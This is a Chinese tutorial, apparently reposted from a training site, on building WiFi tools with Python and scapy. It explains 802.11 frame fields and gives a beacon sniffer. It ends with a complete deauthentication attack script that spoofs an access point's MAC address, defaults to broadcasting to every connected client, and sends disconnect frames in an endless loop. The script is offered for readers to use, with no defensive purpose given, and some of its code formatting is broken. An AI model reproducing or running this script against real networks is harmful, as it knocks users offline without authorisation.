pythonddos博客园_教你用python打造WiFiddos

本文来源于i春秋学院，未经允许严禁转载。

0x00 前言

因为在百度上很难找到有关于用python打造WiFidos的工具的，而且不希望大家成为一名脚本小子，所以我打算写一篇，需要的工具有scapy，iwconfig(能开启你网卡监听功能的工具)，当然少不了python

，我这里是kali2.0的环境，所以可能跟你们的有所不同

0x01配置scapy

先打开python2.7解释器，scapy是只支持2.x的，不支持3，先输入下列命令，在python解释器里面

from scapy.all import *

会出现如下图的显示

 

这种情况是因为他有IPV6的东西包含了进去，这些东西不必要而且还影响整个程序的美观，所以要把这东西去掉。

在kali里面scapy有好几个，但是真正是给python用的就是这个路径：usr/share/pyshared/scapy

 

打开all.py把里面导入ipv6的东西注释掉

 

把这3行注释了在用一下

from scapy.all import *

这次就不会有那个东西了

 

但是我们还没有配置完

，还有一个地方要配置，因为scapy的send函数，只要发送一个数据包就会执行

print "send %s packets"

还有

os.write(1,'.')

但是我们如果要发送多个数据包的时候，那这种功能就变成刷屏了，

这些功能是在：usr/share/pyshared/scapy下一个叫sendrecv，我这里直接搜索了

 

打开这个文件，找到__gen_send这个函数，然后把他的输出的地方注释了，然后在底下输入pass，不然会报错，如下图所示

 

好了我们现在就算配置完毕了。

0x02 802.11数据包结构简单分析 (不会对原理过多讲解)

要用wireshark捕获802.11数据包首先要让网卡变成监听模式

下面是iwconfig方法开启

ifconfig iface down

iwconfig iface mode monitor

ifconfig iface up

下面是aircrack-ng开启

airmon-ng start iface

2种方法都行，现在开始分析

首先802.11数据包有一个RadioTap头

 

注意我箭头指着的地方，那里就是RadioTap头，radiotap包含一些关于数据帧的额外信息，想了解更多可以参考http://www.radiotap.org

之后就是IEEE 802.11数据

 

这里只提几个地方

第一个Type/Subtype，简单来说，就是来声明这个数据包是什么拿来干什么的。

第二个就是receiver address(RA)和destination address(DA)，为什么要把这2个放在一起讲呢，就是因为这2个其实是完全一样的，如下图

 

2个的数据包真实的地方是完全一样的，这个地址代表最终要到达的地方

第三个就是transmitter address(TA)和source address(SA)，他们跟第二个也是相同，都是一样的，所以一起讲，TA就是当前发送数据包的地址，SA代表源发送地址，所以都是自己

第四个就是bssid，bssid就是路由器的地址

第五个就是ESSID(ESSID就是WiFi的名字)，只会出现在type/subtype是0/8，也就是beacon frame的时候，beacon frame就是用来通知别人他的存在，里面会包含一些其他数据，其中就有ESSID，这个数据包不是上面4个那样，他是跟在他们屁股后面的，如图

 

essid就在如下图的地方

 

0x03 打造一款简易WiFi探测器

现在基础的部分讲完，开始真正实战了。

首先看看我们需要的数据包，scapy是一款很强大的工具，提供各种数据包类型，可以用ls()查看

这里我们只需要和802.11相关的，也就是如下图所示

 

也就是RadioTap()   Dot11()   Dot11Elt，当然，还有一个Dot11Deauth，但是不是这个小节要讲的，所以先不说RadioTap()也不用怎么讲，知道他是第一个就好了，这些都是用来构造数据包的方法

先来看看Dot11这个数据包

 

这里addr1就是刚刚的RA DA，addr2就是TA SA，addr3就是BSSID，(应该是这样，我也不能肯定，如果有错尽管指出

)

在来看看Dot11Elt

 

这里info就是ESSID了，

还有一个函数需要了解一下，就是sniff()，他的功能就跟他的名字一样，用来嗅探的，他有1个参数需要提一下，prn=func，当嗅探到一个数据包的时候就会调用func，并且把数据包传给func

现在该说的都说了，我就把代码全部拿出来吧

#coding:utf-8

from scapy.all import *

wifi = {}

defscan(packet):

dot = packet.getlayer(Dot11)#从数据包里面提取Dot11这一层的数据，如果没有这一层，返回None

if dot != None:

elt = dot.getlayer(Dot11Elt)#从数据包提取Dot11Elt这一层的数据

if elt != None:

if dot.type == 0 and dot.subtype == 8:#检查是否为beacon frame数据包，因为beacon frame是用来通知用户自己的存在的

bssid = dot.addr3.upper()#提取BSSID

essid = elt.info#提取ESSID

if not wifi.has_key(bssid):#检查是否已经存在字典中，以免打印重复

wifi[bssid]=essid

if essid == "":#有些路由器会隐藏自己的ESSID所以这里为空

essid = ""

print essid+": "+bssid

sniff(prn=scan)#绑定scan函数

 

这就是运行效果，第一行我之前没有去掉，所以有第一行

0x04 打造WiFiDDOS器

如何DDOSWiFi呢，其实很简单，因为802.11的设计导致的，这里有一个Deauth数据，当路由器或者用户发生一些问题的时候，路由器就会发送Deauth数据包来告诉用户不能连接了，然后用户就会与路由器断开连接，所以我们就模拟这种数据包，发送数据包，来达到断网

当要发送Deauth数据包的时候，Dot11的type/subtype是0/12的时候，因为type默认为0，所以待会构造数据包的时候只用让subtype等于0xC就好，然后一个Dot11Deauth会跟在Dot11后面，就像如图的那种关系

 

就类似与这样的关系，代码就是这样构造的

RadioTap()\Dot11()\Dot11Deauth()

有1个函数要介绍一下sendp，工作在第二层用来发送数据包的，有一个参数要说一下，就是iface=网卡，用来设置什么网卡来发送数据包的，要发送的数据包直接放在参数第一个，比如数据包的名字叫pkt，网卡为wlan0，那就是sendp(pkt,iface='wlan0')

#coding:utf-8

import sys

from scapy.all import *

from optparse import OptionParser#这个我不讲，因为不是本章重点，请自行百度

usage="Usage:%prog -i interface -t packet-type -a bssid -c client-MAC(optional)"

parser=OptionParser(usage)

parser.add_option('-i',dest="interface",help="network card")

parser.add_option('-t',dest="type",help="the reason for the termination code,0-9(optional)")

parser.add_option('-a',dest="bssid",help="the Access Point you want to attack")

parser.add_option('-c',dest="c_mac",help="the client's MAC address(optional)")

(options,args) = parser.parse_args()

if len(sys.argv) < 2:

parser.print_help()

sys.exit(0)

elif options.interface is None or \

options.bssid is None:

parser.print_help()

sys.exit()

c_mac = options.c_mac

t_type = options.type

iface = options.interface

bssid = options.bssid

if t_type == None:

t_type = 0

if c_mac == None:

c_mac = "ff:ff:ff:ff:ff:ff".upper()#如果用户没有输入地址，就赋值为广播地址(让连接WiFi的全部断网)

pkt = RadioTap()/\

Dot11(subtype=0x00c,addr1=c_mac,addr2=bssid,addr3=bssid)/\#addr1为最终要到达的地址，addr2为来源地址这伪造成路由器MAC，addr3就不说了，subtype为0x00c代表为Deauth数据包

Dot11Deauth(reason=int(t_type))#定义为什么会断线

while True:

sendp(pkt,iface=iface)#无限发送数据包

0x05 结束语

我写这篇文章，主要的目的就是不希望大家成为一名脚本小子，只会用别人的工具，而不能自己开发工具，我感觉这样是很窝囊的，一辈子只能活在别人的脚下。